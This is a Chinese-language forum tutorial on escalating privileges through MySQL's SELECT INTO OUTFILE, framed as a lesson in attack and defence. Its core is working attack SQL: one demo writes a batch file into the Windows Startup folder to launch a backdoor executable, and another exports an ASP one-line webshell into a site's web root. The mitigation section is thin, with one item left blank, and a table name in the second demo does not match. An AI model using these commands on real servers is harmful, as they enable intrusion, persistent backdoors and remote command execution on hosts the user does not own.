大家一起来学习一起进步好教程好论坛看了就知道

　　　　　　教程名字：揭晓黑客利用MYSQL导出表提权与防护教程
                            文章／教程／录制 作者：中国知音　性质：网络攻防
                           本教程版权属于:[color=" />0" />0080] www.163day.net　别的网站可以转载
郑重声明:请勿使用本教程中的知识从事非法行为，否则后果自负！做出教程只是让大家知道黑客技术原理，来提高我们的安全防护知识．　                                  然后怎么去防护好自己的网站服务器,免遭受黑客入侵.
　　　　　　　　　　　　　　　同时声明：我不是黑客，喜欢网络攻防。
===============================================================================================

第一次做语音教程。有点紧张。请大家谅解。。。谢谢。
因为很多朋友问我，怎么样提权．．其实提权方法真的很多．而且非常的灵活．最想说的是．．
提权：靠的的是综合知识的积累．但是我不倡导大家去提权服务器搞破坏．我出教程是为了让大家明白那些黑客是怎么样去把别人服务器黑掉．今天给大家这个教程．是没有人做过的教程．至少我没有在网上见过．
◆经常出现被黑客黑的群体分析◆：有虚拟主机空间商．还有安全意识弱的网站服务器．（想到这些大家都知道虚拟主机技术管理员都很很头疼。。为什么呢。。下面揭晓。）因为虚拟主机的服务商都会给你一个Mysql的账号和密码．
●黑客知识原理：
　　黑客利用已经得到的root账号和密码．建立一个表．→在表中输入我们的提权内容→出表。→完成他们的目的。
●关键一步分析：黑客们如何得到root帐户和密码？
MySQL是一个小型关系型数据库管理系统，开发者为瑞典MySQL AB公司。目前MySQL被广泛地应用在Internet上的中小型网站中。由于其体积小、速度快、总体拥有成本低，尤其是开放源码这一特点，许多中小型网站为了降低网站总体拥有成本而选择了MySQL作为网站数据库。
  
◆分析可能被利用到的漏洞1：由于mysql默认开启3306端口．如果我们的服务器默认密码不设置就是空密码．那么黑客们就可能利用该弱口令漏洞．来攻击我们的服务器．
◆分析可能被利用到的漏洞2.如果在得到用户名为：root 密码为：（空密码时候），那些黑客是如何攻击进我们网站的．答案他们利用导出一句话木马．
◆分析可能被利用到的漏洞3.黑客可以得到一个webshell然后．查看网站配置信息．就可以找到这个账号和密码．
◆分析可能被利用到的漏洞4.虚拟主机提供商，自己给我们的mysql账号和密码．
下面是演示（由于语音我就不多打字了）：
         ●黑客实战演示①●
下面我演示一个方法：是黑客经常利用的提权方法．
在开始菜单的启动项中加入：一个脚本或者批处理．

$dbhost = 'localhost';   // 数据库服务器
$dbuser = 'root';   // 数据库用户名
$dbpw = 'www';    // 数据库密码
$dbname = 'discuz';   // 数据库名
$pconnect = 0;    // 数据库持久连接 0=关闭, 1=打开

一：创建一个新的表
create table bycnboytest (cmd text);
含义:创建了一个新的表，表名为bycnboytest，表中只存放一个字段，字段名为cmd，为text文本］
二是：运行我们的后门木马之类的东西．大家自己灵活．
insert into bycnboytest values ("E:\gz.exe " );
三：输出表为一个bat的脚本文件
select * from bycnboytest into outfile "c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动[url=file://\\ok.bat]\\ok.bat[/url]";
导出一个文件文：ok.bat

         ●黑客实战演示②●
导出一句木马类：
show databases; 看服务器中有些什么数据库
use test;进入数据库
show tables;查看我们进入数据库中有些什么数据表

create table bycnboy2 (cmd text); 创建一个新的表
insert into bycnboy2 values ("<%execute request("textarea1")%> " );在表中插入一句话木马内容

select * from bycnboy9 into outfile "导出到网站物理路径如：D:\www\web\boy.asp";


●防护这类入侵：
★防护方法一：我提出的建议,我们分析下．其实这个是利用电脑启动时候自动运行的一个加载项．
所以我们在必须在这个＂启动＂文件夹．设置下权限．也就不让文件有可写入．建议你的服务器盘格成NTFS这样比较安全．
★防护方法二：在弄好本服务器上所有设置时候．最好装上还原精灵．（这个方法适合掌握知识比较完整的技术员）
★防护方法三：网站配置中ROOT信息文件．必要时候能加下密更好．不过很多的配置文件不可加密．最好的方法就是要做好本服务器网站安全．
★防护方法四：

●原理我是分析出来了。更好的防护方法还要靠我们大家一起努力。●
关于一些细节资料我都会传到我博客还有论坛上去。大家可以下载参考。
教程下载地址： http://www.163day.net/thread-48-1-1.html